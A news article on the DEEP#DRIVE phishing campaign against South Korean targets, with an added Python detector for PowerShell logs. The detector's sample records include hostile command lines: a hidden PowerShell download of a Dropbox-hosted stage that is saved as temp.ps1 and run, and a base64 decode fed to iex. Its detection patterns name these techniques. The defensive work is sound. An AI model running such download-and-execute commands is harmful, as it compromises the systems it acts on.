North Korean hackers are suspected to be behind a phishing campaign named DEEP#DRIVE that has targeted various South Korean entities and claimed thousands of victims. The cyber espionage operation, discovered by Securonix, has been ongoing since September 2024 and aims to gather sensitive information from businesses, government entities, and cryptocurrency users in South Korea.
The attackers used tailored phishing lures written in Korean and disguised as legitimate documents such as work logs, insurance papers, and crypto-related files to gain a foothold in the targeted environments. One example shared by Securonix is a phishing lure posing as the Telegram.exe application, labeled in Korean as 대차 및 파레트 (bogie and pallet), which displayed logistics-related details to deceive victims in the logistics sector.
These phishing lures were distributed in trusted file formats such as .hwp, .xlsx, and .pptx and hosted on popular platforms such as Dropbox to bypass traditional security defenses and blend in with normal user behavior. According to Securonix researchers, phishing was the main method of malware distribution in this campaign, as indicated by the collected samples and by filenames that align with common themes and wording found in phishing lures.
The campaign relied heavily on PowerShell scripts for payload delivery, reconnaissance, and establishing persistence on compromised systems. Dropbox was also used for data exfiltration. The attack chain typically started with a .lnk file disguised as a legitimate document; opening it triggered the execution of malicious PowerShell scripts, which downloaded further payloads and carried out reconnaissance.
The final payload, suspected to be a backdoor, was often delivered through a script named “temp.ps1,” although researchers were unable to capture it during analysis. The attackers’ Dropbox account contained configuration files from compromised systems and various malicious payloads. Stealth and obfuscation techniques were used to avoid detection, and the removal of the associated Dropbox links indicates that the attack infrastructure was temporary.
While the attackers’ infrastructure seemed short-lived, the tactics, techniques, and procedures (TTPs) closely resembled those used by Kimsuky, a North Korean Advanced Persistent Threat (APT) group known for targeting South Korea. Securonix recommends user education on phishing, monitoring of malware staging directories, and reliable endpoint logging, such as PowerShell logging, to protect against similar attacks.
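The recommendations above (PowerShell logging, watching malware staging directories) can be turned into a first-pass triage of script-block logs. The following is an added example written for this page, not code from Securonix or from the article: it scans the text of PowerShell script-block log records (Windows Event ID 4104, which is what PowerShell script block logging produces) for the behaviours the article describes, namely Dropbox-hosted stages, a temp.ps1 script dropped in a user-writable directory, and hidden or encoded invocations. The log records are constructed for the demo, and the indicator patterns and the two-indicator threshold are assumptions chosen for illustration, not a published detection rule.

```python
"""
Added example (not from Securonix or the article): triage PowerShell
script-block log text for the DEEP#DRIVE-style chain the article describes.
Indicator regexes and the threshold are assumptions made for this demo.
"""
import re
from dataclasses import dataclass, field

# Each indicator maps a behaviour from the article's description to a regex.
# A single hit (e.g. a legitimate Invoke-WebRequest) is not enough on its own;
# records are flagged only when two or more distinct behaviours co-occur.
INDICATORS = {
    # Stages and exfiltration hosted on Dropbox
    "dropbox_download": re.compile(
        r"(dropbox\.com|dl\.dropboxusercontent\.com)", re.I),
    # Download cmdlets / .NET download methods used to fetch the next stage
    "web_download_cmdlet": re.compile(
        r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile)", re.I),
    # A script called temp.ps1 staged in a user-writable temp/AppData location
    "staged_temp_script": re.compile(
        r'(\\Temp\\|\\AppData\\|%TEMP%|\$env:TEMP)[^\s"]*temp\.ps1', re.I),
    # Hidden-window, no-profile or base64-encoded invocations (obfuscation)
    "encoded_or_hidden": re.compile(
        r"(-enc(odedcommand)?\b|FromBase64String|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b)", re.I),
    # In-memory execution of decoded or downloaded script text
    "inline_execution": re.compile(r"(Invoke-Expression|\biex\b)", re.I),
}

SUSPICIOUS_THRESHOLD = 2  # assumption: two distinct behaviours in one record


@dataclass
class Finding:
    record_id: int
    matched: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return len(self.matched) >= SUSPICIOUS_THRESHOLD


def scan_script_block(record_id: int, script_text: str) -> Finding:
    """Return which indicators fire for one ScriptBlockText value."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script_text)]
    return Finding(record_id, hits)


def triage(records):
    """records: iterable of (record_id, ScriptBlockText) pairs."""
    return [scan_script_block(rid, text) for rid, text in records]


def suspicious_ids(records):
    """Record ids that cross the threshold, in log order."""
    return [f.record_id for f in triage(records) if f.suspicious]


# Constructed sample records (record id, ScriptBlockText); not real telemetry.
SAMPLE_4104_RECORDS = [
    (1, "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    (2, "powershell.exe -nop -w hidden -c \"iwr 'https://www.dropbox.com/scl/fi/EXAMPLE/stage.txt?dl=1' "
        "-OutFile $env:TEMP\\temp.ps1; & $env:TEMP\\temp.ps1\""),
    (3, "Invoke-WebRequest https://updates.example.org/patch.msi -OutFile C:\\Users\\alice\\Downloads\\patch.msi"),
    (4, "$b=[Convert]::FromBase64String($d);iex([Text.Encoding]::Unicode.GetString($b))"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_4104_RECORDS):
        status = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"record {f.record_id}: {status} {f.matched}")
```

Record 3, a plain download from a non-Dropbox host, produces one hit and is left alone, while records 2 and 4 are flagged: the point of the threshold is that the download cmdlet, the Dropbox host, the staged temp.ps1 and the hidden/encoded invocation are each common on their own but rarely appear together in one script block. In practice the `records` input would come from the Microsoft-Windows-PowerShell/Operational log rather than the constructed list.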
In conclusion, the DEEP#DRIVE phishing campaign attributed to North Korean hackers and aimed at South Korean entities highlights the ongoing threat of cyber espionage and the importance of robust security measures against such activity. By understanding the techniques employed by threat actors and implementing preventative measures, organizations can strengthen their security posture and reduce the risk of falling victim to targeted attacks.
